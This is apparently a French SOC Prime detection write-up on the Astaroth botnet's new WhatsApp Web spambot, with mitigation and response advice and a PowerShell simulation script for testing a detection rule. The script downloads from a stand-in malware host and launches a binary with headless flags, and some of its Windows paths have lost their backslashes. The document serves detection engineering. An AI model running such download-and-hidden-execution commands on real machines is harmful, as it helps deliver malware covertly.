SOC Prime Bias: Élevé

30 Jul 2026 15:38 UTC

Astaroth ajoute un nouveau composant spammeur pour les campagnes d’e-mails

Author Photo
SOC Prime Team linkedin icon Suivre
Astaroth ajoute un nouveau composant spammeur pour les campagnes d’e-mails
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Résumé

Les opérateurs du botnet Astaroth ont ajouté un nouveau composant de spambot WhatsApp Web pour étendre leur portée dans l’écosystème eCrime d’Amérique latine. Le module utilise l’automatisation de navigateur sans interface pour transformer les victimes compromises en nœuds de distribution en envoyant des messages malveillants à leurs contacts WhatsApp. Ce développement marque une transition du spam traditionnel par e-mail vers les plateformes de messagerie sociale.

Enquête

L’enquête comprenait une analyse technique détaillée du spambot Astaroth, dévoilant le chiffrement AES-CTS, un processus complexe d’obfuscation en six étapes des chaînes de caractères, et des structures de configuration personnalisées. Les chercheurs ont identifié des similitudes de code substantielles entre les spambots Astaroth et Vareg, suggérant des développeurs partagés ou des accords d’échange de code. L’analyse a également confirmé l’abus des frameworks d’automatisation de navigateur légitimes, y compris WebDriver et WPPConnect/WA-JS, pour mener des campagnes de spam cachées.

Atténuation

Les organisations devraient éduquer les utilisateurs sur l’ingénierie sociale basée sur WhatsApp et décourager l’ouverture ou l’exécution de fichiers reçus de contacts inconnus. Les protections de téléchargement de navigateur devraient être activées, tandis que les téléchargements et exécutions non autorisés de WebDriver devraient être étroitement surveillés. Les équipes de sécurité devraient également surveiller la création suspecte de répertoires dans le dossier Temp de Windows et envisager de bloquer WPPConnect/WA-JS lorsqu’il n’est pas nécessaire à des fins commerciales légitimes.

Réponse

Si une activité d’Astaroth est détectée, les points d’extrémité affectés devraient être immédiatement isolés pour stopper la propagation supplémentaire du spam et la livraison de logiciels malveillants. Les enquêteurs devraient rechercher des processus de navigateur sans interface et des ChromeAuto_ répertoires dans C:UsersPublicTemp. Les processus WebDriver identifiés devraient subir une analyse légale, et l’activité réseau devrait être révisée pour détecter des connexions non autorisées à l’infrastructure C2 connue d’Astaroth.

Flux d’Attaque

Exécution de Simulation

Prérequis : Le Contrôle Préliminaire de Télémétrie & Baseline doit avoir été passé.

Justification : Cette section détaille l’exécution précise de la technique adversaire (TTP) conçue pour déclencher la règle de détection. Les commandes et le récit DOIVENT refléter directement les TTP identifiés et viser à générer la télémétrie exacte attendue par la logique de détection. Des exemples abstraits ou non liés entraîneront un diagnostic erroné.

  • Narration d’Attaque & Commandes : L’adversaire a l’intention de déployer un module de spam automatisé sur WhatsApp. Pour ce faire, ils utilisent d’abord une technique de vie hors du terrain, utilisant PowerShell pour télécharger un WebDriver binaire dans un répertoire local. Une fois l’outil présent, l’adversaire exécute le binaire en utilisant les --headless and --disable-infobars indicateurs. Cela permet à l’automatisation de s’exécuter en arrière-plan, invisible pour l’utilisateur, facilitant la campagne de spam tout en minimisant l’empreinte sur l’hôte.

  • Script de Test de Régression :

    # Script de Simulation du Spambot Astaroth
    # Ce script simule la séquence de téléchargement et d'exécution définie dans la règle de détection.
    
    $workDir = "$env:TEMPWebDriverSimulation"
    if (!(Test-Path $workDir)) { New-Item -Path $workDir -ItemType Directory }
    Set-Location $workDir
    
    # 1. Simulation de Téléchargement (Déclenche le selection_webdriver_download)
    Write-Host "[+] Simulation du téléchargement de WebDriver via PowerShell..."
    $dummyWebDriver = "WebDriver.exe"
    New-Item -Path $dummyWebDriver -ItemType File
    # Imitant la ligne de commande que la règle recherche
    powershell.exe -Command "Invoke-WebRequest -Uri 'http://fake-malware-site.com/WebDriver' -OutFile 'WebDriver.exe'"
    
    # 2. Simulation d'Exécution (Déclenche le selection_webdriver_execution et le selection_session_creation)
    Write-Host "[+] Simulation de l'exécution de WebDriver avec des indicateurs sans tête..."
    # Nous utilisons Start-Process pour garantir que la ligne de commande est capturée comme un événement de création de processus
    Start-Process -FilePath ".$dummyWebDriver" -ArgumentList "--headless", "--disable-infobars" -NoNewWindow
  • Commandes de Nettoyage :

    # Nettoyage des artefacts de simulation
    Remove-Item -Path "$env:TEMPWebDriverSimulation" -Recurse -Force
    Write-Host "[+] Nettoyage terminé."